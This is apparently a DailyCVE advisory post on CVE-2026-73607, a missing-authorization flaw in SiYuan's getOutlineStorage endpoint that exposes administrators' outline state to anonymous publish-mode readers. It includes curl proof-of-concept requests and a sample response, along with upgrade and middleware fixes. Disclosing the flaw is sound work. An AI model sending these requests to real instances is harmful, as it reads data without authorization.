SiYuan, Missing Authorization, CVE-2026-73607 (Medium) -DC-Oct2026-2700

Listen to this Post

CVE-2026-73607 is a missing authorization vulnerability in SiYuan versions before v3.7.4. The endpoint `/api/storage/getOutlineStorage` is registered with only `CheckAuth` and performs no further authorization checks. Given a document identifier (docID), it returns the stored outline state for that document regardless of the document’s publish tier. The two write endpoints for the same data, `setOutlineStorage` and removeOutlineStorage, both carry `CheckAdminRole` and `CheckReadonly` middleware. Only the read path lacks these guards. The handler binds `docID` and calls model.GetOutlineStorage(docID), which iterates stored outline documents and returns the entry matching the supplied identifier. There is no filter function on this path: no gin.Context, no publish-access check, no password check, and no visibility check. The stored data is defined as type OutlineDoc { DocID string; Data map

any }</code>. The client writes it from `app/src/layout/dock/Outline.ts:742` via <code>fetchPost("/api/storage/setOutlineStorage", { docID: this.blockId, val: { expandIds: this.tree.getExpandIds() } })</code>. Thus the payload contains the set of heading block identifiers that the administrator has expanded in the outline pane for that document. An empty result versus a populated one also indicates whether the administrator has ever worked with that document's outline. This endpoint was not covered by commit <code>4daee87d4</code>, which addressed <code>getLocalStorage</code>, <code>getLocalStorageVal</code>, <code>getLocalStorageVals</code>, and <code>FilterLocalStorageByPublishAccess</code>. The word "outline" does not appear in that diff. A proof of concept on Kernel 3.7.2 with publish mode on port 6808 and `Publish.Auth.Enable` false shows that an anonymous client with no auth header can read the same outline state that an administrator wrote through the authenticated port. When the document is set to the forbidden tier, `getDoc` returns a forbidden placeholder with content withheld, but `getOutlineStorage` still returns the full payload. The impact is that an anonymous reader in publish mode, or any publish <code>RoleReader</code>, can retrieve the administrator's outline state for any document whose identifier they hold, including documents in the forbidden tier that publish filters otherwise withhold entirely. The disclosed values are heading block identifiers, usable as input to other endpoints, and the presence or absence of an entry indicates whether the administrator has worked with that document. No document text is returned; the vulnerability affects confidentiality only. The suggested fix is to gate the read path as the write paths already are: either add `CheckAdminRole` and `CheckReadonly` at the route, matching `setOutlineStorage` and <code>removeOutlineStorage</code>, or pass `gin.Context` into `GetOutlineStorage` and apply `checkBlockTreeAccessableByPublishAccess` against the requested `docID` before returning anything.

<h2 class="f1b-anim" style="color:#3b82f6;border-left:4px solid #3b82f6;padding-left:12px;margin:22px 0 10px 0;font-weight:bold">DailyCVE Form:</h2>

Platform: SiYuan
Version: before 3.7.4
Vulnerability: Missing Authorization
Severity: Medium
date: 2026-08-13

<h2 class="f1b-anim" style="color:#3b82f6;border-left:4px solid #3b82f6;padding-left:12px;margin:22px 0 10px 0;font-weight:bold">Prediction: 2026-08-13</h2>

<h2 class="f1b-anim" style="color:#3b82f6;border-left:4px solid #3b82f6;padding-left:12px;margin:22px 0 10px 0;font-weight:bold">What Undercode Say:</h2>

[bash]
Write outline state as administrator (authenticated port)
curl -X POST http://127.0.0.1:6806/api/storage/setOutlineStorage \
-H "Authorization: Token <admin-token>" \
-d '{"docID":"<doc id>","val":{"openIDs":["<heading id>","<heading id>"]}}'
Read the same outline state anonymously (publish port)
curl -X POST http://127.0.0.1:6808/api/storage/getOutlineStorage \
-d '{"docID":"<doc id>"}'
// Client-side write (Outline.ts:742)
fetchPost("/api/storage/setOutlineStorage", {
docID: this.blockId,
val: { expandIds: this.tree.getExpandIds() }
});
// Route registration (kernel/api/router.go)
ginServer.Handle("POST", "/api/storage/getOutlineStorage", model.CheckAuth, getOutlineStorage)
ginServer.Handle("POST", "/api/storage/setOutlineStorage", model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, setOutlineStorage)
ginServer.Handle("POST", "/api/storage/removeOutlineStorage", model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, removeOutlineStorage)

Exploit: (Educational Purposes!)

Anonymous retrieval of outline state from a publish-mode SiYuan instance
curl -X POST http://127.0.0.1:6808/api/storage/getOutlineStorage \
-H "Content-Type: application/json" \
-d '{"docID":"20210808180117-6v0mkxr"}'

Response:

{"code":0,"msg":"","data":{"openIDs":["20210808180117-6v0mkxr","20210808180117-6v0mkxs"]}}

Protection: from this CVE

Upgrade to SiYuan v3.7.4 or later. Alternatively, add `CheckAdminRole` and `CheckReadonly` middleware to the `getOutlineStorage` route, or apply `checkBlockTreeAccessableByPublishAccess` inside the handler using the request context and docID.

Impact:

An anonymous reader in publish mode, or any publish RoleReader, can retrieve the administrator's outline state for any document whose identifier they hold, including documents in the forbidden tier that publish filters otherwise withhold entirely. The disclosed values are heading block identifiers, usable as input to other endpoints, and the presence or absence of an entry indicates whether the administrator has worked with that document. No document text is returned. Confidentiality only.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top